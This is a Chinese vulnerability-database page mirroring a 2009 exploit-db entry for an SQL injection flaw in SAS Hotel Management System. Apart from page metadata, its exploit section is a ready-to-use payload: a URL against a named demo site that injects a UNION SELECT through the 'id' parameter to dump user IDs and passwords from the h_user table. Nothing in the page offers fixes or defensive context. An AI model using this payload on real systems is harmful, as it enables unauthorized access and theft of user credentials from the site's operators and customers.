SAS Hotel Management System - 'id' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057458 漏洞类型
发布时间 2009-02-16 更新时间 2009-02-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8065
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#found by DarkB0x
#contact darkB0x97[AT]googlemail.com
#greets for str0ke & AlpHaNiX

#script           : SAS Hotel Management System
#download         : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo             : http://www.aebest.com


#Exploits :

//*/

http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user


#note : the injection's details are in page title ! xD

# milw0rm.com [2009-02-16]